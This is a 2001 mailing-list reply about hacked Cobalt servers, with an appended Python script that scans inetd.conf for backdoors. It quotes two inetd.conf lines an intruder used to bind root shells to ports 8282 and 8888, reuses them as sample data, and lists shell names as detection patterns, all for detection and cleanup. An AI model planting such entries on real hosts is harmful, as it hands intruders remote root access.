Re: [cobalt-users] Recent Hacks
- Subject: Re: [cobalt-users] Recent Hacks
- From: Jeff Bilicki <jeff@xxxxxxxxxxx>
- Date: Wed Feb 14 17:33:02 2001
- List-id: Mailing list for users to share thoughts on Cobalt products. <cobalt-users.list.cobalt.com>
<Pine.BSI.4.05L.10102081915120.22901-100000@xxxxxxxxxxxxxxxxxxx> wrote:
> I've had the exact same problems on some of our boxes. Look in the /bin
> directory for extra files they tuck in there, and they also replaced some.
> For instance, look at /bin/ls - they replaced it on several of our
> boxes. Normally it's like 50kb, but on the hacked boxes it's 120kb. What I
> did to get telnet working was to hard-reboot the box. To get the httpd
> back and running, you have to go create a directory called "httpd" where
> the error says it wants it when you try to manually restart httpd. But
> your box is still compromised, and you're better off getting all your
> files off of it and doing a complete wipe and restore.
I was on a hacked box today in which the cracker's way back in was tossing the
following lines into inetd.conf:
8282 stream tcp nowait root /bin/sh sh -i
8888 stream tcp nowait root /bin/bash bash -i
Simple and utterly effective. Kind of funny too.
I would suggest checking the output of netstat -natp to see what is listening
on your TCP ports.
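An added defender-side check, not part of the original thread: this script parses inetd.conf (field order: service, socket type, protocol, wait/nowait, user, program, args) and flags entries whose server program is a shell or whose service is a bare port number, noting when they run as root. The sample configuration is constructed for this example and includes the two lines quoted above.

```python
import os

# Constructed sample /etc/inetd.conf: three ordinary tcpd-wrapped services
# plus the two backdoor lines quoted in the message above.
SAMPLE_INETD_CONF = """\
# Constructed sample, not a real host's configuration
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
pop-3   stream  tcp  nowait  root  /usr/sbin/tcpd  ipop3d
8282 stream tcp nowait root /bin/sh sh -i
8888 stream tcp nowait root /bin/bash bash -i
"""

# Interpreter names that have no business being an inetd server program.
SHELLS = {"sh", "bash", "ash", "dash", "csh", "tcsh", "ksh", "zsh"}


def parse_inetd_conf(text):
    """Parse inetd.conf lines into dicts; comments and blank lines are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        fields = line.split()
        if len(fields) < 6:  # not a complete service line
            continue
        service, socktype, proto, wait, user, program = fields[:6]
        entries.append({
            "service": service, "socktype": socktype, "proto": proto,
            "wait": wait, "user": user, "program": program, "args": fields[6:],
        })
    return entries


def suspicious_entries(text):
    """Return [(service, [reasons])] for entries that look like inetd backdoors."""
    findings = []
    for e in parse_inetd_conf(text):
        reasons = []
        if os.path.basename(e["program"]) in SHELLS:
            reasons.append("server program is a shell")
        if e["service"].isdigit():
            reasons.append("service given as a bare port number")
        # user field may be written as user or user.group
        if reasons and e["user"].split(".")[0] == "root":
            reasons.append("runs as root")
        if reasons:
            findings.append((e["service"], reasons))
    return findings


if __name__ == "__main__":
    for service, reasons in suspicious_entries(SAMPLE_INETD_CONF):
        print(f"{service}: {', '.join(reasons)}")
```

Pair this with the netstat -natp check: a listener on a port that maps to no inetd.conf entry or /etc/services name deserves the same scrutiny.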